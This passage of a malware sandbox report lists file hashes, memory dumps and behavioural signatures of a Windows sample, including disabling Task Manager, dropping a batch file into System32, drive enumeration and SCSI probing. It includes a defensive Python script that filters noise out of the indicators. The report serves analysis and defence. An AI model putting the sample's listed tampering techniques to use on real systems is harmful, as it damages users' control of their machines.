| SHA1 | 9d64ca9262852e3ee4b5e098e2762401364e80e8 |
| SHA256 | 506b80e8f8551e29fa1e93082fefc99ce6613ad7abae895d61bdda92f4dce8c3 |
| SHA512 | ca282eedf7851df48e0ae001684ca4400b6a43e14893610972496e7c4c7002c508b95278896176ef4d49d371d95b6cc759609313a833bcdbc010a064cb28170f |
memory/3612-106-0x0000000000710000-0x000000000072B000-memory.dmp
memory/980-107-0x0000000000D70000-0x0000000000D8B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe
| MD5 | 7cfd733ea3aedb94f04013881f8a9f14 |
| SHA1 | 94642432fd416ec32f1cd17dfd9b23922432dcea |
| SHA256 | fceb50190c036057c6386387ed115b83a9fec153332b80be4d891cb9ef8f624a |
| SHA512 | 8c2b83a6aa96bed630e950cb66cd3a50e4789f303b9f2f3f2f6043f16a3a26d7dc9a56aa43cb3af0e548b207d5a228b88eaacb0b1872fc8abd4e1191f465e323 |
memory/4644-111-0x0000000000120000-0x000000000013B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1eb86108cb8f5a956fdf48efbd5d06fe |
| SHA1 | 7b2b299f753798e4891df2d9cbf30f94b39ef924 |
| SHA256 | 1b53367e0041d54af89e7dd59733231f5da1393c551ed2b943c89166c0baca40 |
| SHA512 | e2a661437688a4a01a6eb3b2bd7979ecf96b806f5a487d39354a7f0d44cb693a3b1c2cf6b1247b04e4106cc816105e982569572042bdddb3cd5bec23b4fce29d |
\??\pipe\LOCAL\crashpad_4940_MLMOWQNPGQQWYWWG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f35bb0615bb9816f562b83304e456294 |
| SHA1 | 1049e2bd3e1bbb4cea572467d7c4a96648659cb4 |
| SHA256 | 05e80abd624454e5b860a08f40ddf33d672c3fed319aac180b7de5754bc07b71 |
| SHA512 | db9100f3e324e74a9c58c7d9f50c25eaa4c6c4553c93bab9b80c6f7bef777db04111ebcd679f94015203b240fe9f4f371cae0d4290ec891a4173c746ff4b11c1 |
C:\Users\Admin\AppData\Local\Temp\New_Names.exe
| MD5 | dd799cfa99ea38299f32a744b4a9864c |
| SHA1 | 850457eea90f64bb760d078008f17799f8eb4843 |
| SHA256 | f9f469026252b2c7084755430c9b0d8939a8547b23a5bb32371102d7a3578ed1 |
| SHA512 | 9c74976ea217276bf5b291d629aa21ace989a45697748cb449eeba8d8c846e77e7ab66c1b701243ceb207db364d1abc376950c6b5f4cb92db068922ae41dcef3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bc9d8be2e42384192149e0e87b69b02f |
| SHA1 | d4296e6ca6d9ff008f2c16d8ea03e98854544ac3 |
| SHA256 | 599e467ce73a549198a24814f304bc2ec8018cf54c789789a049399ff3ea0a7e |
| SHA512 | 0f561256f5a5be9b81718ad1a566239e2b296f3a32064f0352b48f226013842fb2d3a55ed0086c325130d8aee0cfb0ed66bcb6c9c52f1591edbcbdedc6944c70 |
memory/4876-136-0x0000000000620000-0x0000000000621000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d92e4da4faae0e867d59569edf2d87b7 |
| SHA1 | 3e2a6fa09e2367869dd662c69e2ad2c1ea129f93 |
| SHA256 | 44bc65e3fc9de1cd5c75728ab9917927ad7bf1868db8a98103dc98523a55dc3a |
| SHA512 | 1b94ef986a964997f76fb97d7ab7b21daf4f5c9292200b9742b7e6a602b9b57f32c346ad982368484e4e29fdb37f8287014c10736b04d65be93e76887e359d99 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 166d22894e297b9754dfe0668cd1f667 |
| SHA1 | 1e5b6d54d2382039bdfb1b67d3d9a5874473cd8e |
| SHA256 | d52a5a60e5cc00da16975119d72b28a4948d9bff9ddec114efdd49c126382b42 |
| SHA512 | 276eb84495182be248699e9c8fbb2196de81269778806e52ede806212ca0abfcfe320c808b14f3dd81a9b099bdf67652361a664d4074f8cfc53390be6087092c |
memory/4876-189-0x0000000000400000-0x0000000000468000-memory.dmp
memory/4644-190-0x0000000000120000-0x000000000013B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 09c29ec24437bf13a1de6d0993ec7092 |
| SHA1 | 7d11fec61b9db61974052c7585adefc63a17b420 |
| SHA256 | 7fe06033b73300a800c45d2d74760b2c24c8c60147416439f27f8cfad015fd5e |
| SHA512 | 7f89881d6309e72f57c27c2de802dea927e6f326230fdbb559335b58554dcca52ef07d34c28dd31138db55324b3888ba56d3b263fc78e0b542c7d05e3ff1077c |
memory/5096-214-0x0000000000440000-0x000000000045B000-memory.dmp
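IOC hygiene pass over the network table and the Files section above, as an added example (it is not the sandbox's own tooling or anything from the sample's authors). Two entries in this report must not be copied into a blocklist: the `\??\pipe\LOCAL\crashpad_...` entry carries the well-known digests of a zero-length file, and the Edge `Crashpad\settings.dat`, `Preferences` and `Local State` files are profile writes by the browser rather than drops by the sample. The script parses the page's own layout (a path line followed by `| MD5 | ... |` rows; the `| Country | Destination | Domain | Proto |` table, tolerating rows whose Domain and Proto cells are swapped), validates digest lengths, and splits publishable hashes from rejected noise. Assumptions, labelled in the code: Edge profile paths and named pipes are host noise, multicast and reverse PTR lookups are sandbox/OS noise, and the sample input is a constructed excerpt of this page's rows.

```python
"""IOC hygiene pass over a sandbox report's dropped-file and network sections.

Added example for this page, not tooling from the sandbox or the sample's
authors.  Separates hashes that are safe to publish from entries that must not
go into a blocklist: digests of the zero-length file and browser-profile
artefacts written by the host rather than the sample.
"""
import re

# Digests of the empty file: an IOC feed carrying these matches every host.
EMPTY_FILE_HASHES = {
    "MD5": "d41d8cd98f00b204e9800998ecf8427e",
    "SHA1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
    "SHA256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Assumption: Edge profile files and named pipes are host noise, not drops.
NOISE_PATH_RE = re.compile(r"\\Microsoft\\Edge\\User Data\\|^\\\?\?\\pipe\\", re.I)
PROTOS = ("tcp", "udp")

# Constructed excerpt of this page's rows (same layout, including one row
# whose proto landed in the Domain column).
SAMPLE_REPORT = r"""
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | neave.tv | udp |
| US | 104.21.234.134:443 | neave.tv | tcp |
| US | 104.21.234.134:443 | neave.tv | tcp |
| N/A | 224.0.0.251:5353 | udp | |
Files
C:\Users\Admin\AppData\Local\Temp\START.exe
| MD5 | b9e9b7fbd019b7e09e77bdec78ade264 |
| SHA256 | 227e8953a11d22ea948fe3b2426753a435993336ae1f49a6fe3c1dd0b70bf3b7 |
memory/4156-74-0x0000000000EB0000-0x0000000000ECB000-memory.dmp
\??\pipe\LOCAL\crashpad_4940_MLMOWQNPGQQWYWWG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d92e4da4faae0e867d59569edf2d87b7 |
C:\Users\Admin\AppData\Local\Temp\ZbDz.bat
| MD5 | 90716ec6d805a3e478c0a26477138efd |
| SHA256 | f185b92c729b011a051d2d8775eee998da9e71ba6156a8da81b0fc1b25c90a77 |
"""


def _cells(line):
    return [c.strip() for c in line.strip("|").split("|")]


def parse_report(text):
    """Return ({path: {algo: digest}}, {(destination, domain, proto)})."""
    files, network, current = {}, set(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "Files":
            continue
        if line.startswith("memory/"):      # memory dumps carry no hash rows
            current = None
            continue
        if not line.startswith("|"):        # a dropped-file path
            current = line
            files.setdefault(current, {})
            continue
        cells = _cells(line)
        if len(cells) == 2 and cells[0] in HEX_LEN and current is not None:
            algo, digest = cells
            if not re.fullmatch(r"[0-9a-f]{%d}" % HEX_LEN[algo], digest):
                raise ValueError(f"malformed {algo} for {current}: {digest}")
            files[current][algo] = digest
        elif len(cells) == 4 and cells[0] != "Country":
            rest = cells[2:]                # Domain/Proto, in either order
            proto = next((c for c in rest if c in PROTOS), "")
            domain = next((c for c in rest if c and c not in PROTOS), "")
            network.add((cells[1], domain, proto))
    return files, network


def triage(files, network):
    """Split parsed entries into publishable IOCs and rejected noise."""
    blocklist, rejected = {}, {}
    for path, hashes in files.items():
        if any(hashes.get(a) == h for a, h in EMPTY_FILE_HASHES.items()):
            rejected[path] = "empty-file hash"
        elif NOISE_PATH_RE.search(path):
            rejected[path] = "host/browser artefact"
        elif not hashes:
            rejected[path] = "no digest recorded"
        else:
            blocklist[path] = hashes
    # Assumption: multicast (mDNS) and reverse PTR lookups are sandbox/OS noise.
    c2 = sorted({(d, dom) for d, dom, p in network
                 if p == "tcp" and not d.startswith("224.")})
    dns = sorted({dom for d, dom, p in network
                  if p == "udp" and dom and not dom.endswith(".in-addr.arpa")})
    return blocklist, rejected, c2, dns


if __name__ == "__main__":
    bl, rej, c2, dns = triage(*parse_report(SAMPLE_REPORT))
    for path, hashes in bl.items():
        print("PUBLISH", path, hashes.get("SHA256", hashes.get("MD5")))
    for path, why in rej.items():
        print("REJECT ", path, "->", why)
    print("C2/TCP:", c2)
    print("DNS   :", dns)
```

Run against the full section, the pass keeps the Temp drops (START.exe, Killer.exe, the .vbs/.bat/.js pairs, the renamed payload executables) and rejects the crashpad pipe and every Edge profile file; on the network side it leaves the 138.91.171.81:80 connection, the two neave.tv/neave.com TLS connections and their lookups, while dropping the mDNS multicast row and the reverse lookups of Microsoft and Cloudflare address space that the OS performed on its own.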
Analysis: behavioral14
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
45s
Max time network
192s
Command Line
Signatures
Disables Task Manager via registry modification
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\gosha.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\gosha.bat | C:\Windows\system32\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
